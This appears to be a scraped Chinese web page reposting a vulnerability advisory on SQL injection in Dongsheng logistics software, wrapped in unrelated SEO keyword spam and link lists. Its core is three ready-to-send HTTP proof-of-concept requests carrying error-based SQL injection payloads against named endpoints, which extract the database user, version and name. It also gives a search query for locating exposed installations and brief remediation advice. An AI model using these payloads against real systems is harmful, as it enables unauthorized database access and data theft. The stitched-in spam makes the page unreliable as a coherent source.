当前位置: 首页 > news >正文

河南省汝州文明建设门户网站seo代理计费系统

河南省汝州文明建设门户网站,seo代理计费系统,wordpress电商建站,网上学电脑培训中心0x01 产品简介 东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。 0x02 漏洞概述 东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/Sav…

0x01 产品简介

 东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。

0x02 漏洞概述

东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

微步资产测绘:app=东胜物流软件

0x04 漏洞复现 

PoC-1

GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1%27+and+user+%3E0%3B-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询当前用户

PoC-2 

GET /TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort=&condition=123+IN+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2bCHAR(32)%2b(select+%40%40version)%2bCHAR(32)%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113))--%20&page=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询数据库版本

PoC-3

POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D}

 查询当前数据库

0x05 修复建议

官方暂未修复该漏洞,请用户联系厂商修复漏洞:http://www.dongshengsoft.com/

部署Web应用防火墙,对数据库操作进行监控。

如非必要,禁止公网访问该系统。

 

http://www.yayakq.cn/news/817005/

相关文章:

  • 大望路做网站的公司精美的网站
  • 上海建设局网站小程序开发外包费用
  • 如何让订阅号菜单做微网站延庆精神文明建设的门户网站
  • 外贸网站后台温州哪里有做网站的
  • wordpress开启子目录多站点模式建湖人才网
  • 可视化拖拽网站建设软件jsp做手机网站
  • 建设信用卡网站是什么互诺 网站好吗
  • app 门户网站网页制作与网站建设课程设计
  • 木材 技术支持 东莞网站建设wordpress添加媒体库
  • 泰国做彩票网站广州越秀区现在能去吗
  • 烟台市建设工程招标投标协会网站wordpress dragon
  • 手机的网站建设目标是什么今天北京感染了多少人
  • 大连网站开发培训网络营销网站建设实验总结
  • 个人网站制作毕业设计选题重难点怎样自己做网络推广网站
  • 洛阳php网站开发网站推广渠道特点
  • 购物网站分为几个模块高阳县做企业网站
  • 怎么样查询网站被挂黑链廊坊自动seo
  • 物联网技术有哪些抚州seo
  • 网站违规词处罚做网站的四川建设网站项目招标
  • 建设网站写需求分析外链网址
  • 帮助做问卷调查的网站wordpress登录js
  • 如何用ps做网站玉林市建设局网站
  • 建设垂直网站需要哪些流程图彩票交易网站开发
  • 毕业设计拼车网站的建设雨实现网站开发的完整流程图
  • 短视频运营宁波seo网络推广公司
  • 网站设计机构文档网站建设标签
  • 室内设计知名网站html 导入wordpress
  • 酒店网站建设特色环球资源平台的优势
  • 有做国外网站推广吗兴义市住房和城乡建设局网签网站
  • 衡阳市住房和城乡建设局官方网站php网站开发职责